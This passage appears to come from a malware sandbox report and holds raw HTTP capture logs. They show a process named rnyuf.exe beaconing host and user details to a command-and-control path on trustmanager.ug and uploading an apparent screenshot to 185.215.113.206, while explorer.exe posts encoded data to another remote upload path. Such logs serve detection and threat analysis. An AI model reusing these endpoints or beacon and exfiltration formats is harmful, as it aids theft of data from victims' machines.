66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.397425890 CEST	17179	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.3	49834	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.437155008 CEST	17180	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:09.463130951 CEST	17182	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.463191032 CEST	17182	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.3	49835	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.465415955 CEST	17182	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:09.465591908 CEST	17183	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:09.465866089 CEST	17193	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:09.466013908 CEST	17195	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:09.526591063 CEST	17198	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:09.526665926 CEST	17201	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:09.526698112 CEST	17204	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:09.526865959 CEST	17206	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:09.526957989 CEST	17209	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:09.527170897 CEST	17212	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:09.527261972 CEST	17215	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:09.771765947 CEST	17280	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49733	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:34.779098988 CEST	8621	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: atvcampingtrips.com
Aug 23, 2021 02:08:34.779130936 CEST	8621	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 64 05 d8 e8 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vud\|@`3OT^<i(r%\|TL 4"NbNH#%\|mkN\fW3b@'1PbHsudj`J@y
Aug 23, 2021 02:08:35.951947927 CEST	8622	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:35 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.3	49836	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.598998070 CEST	17273	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:09.624845028 CEST	17274	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 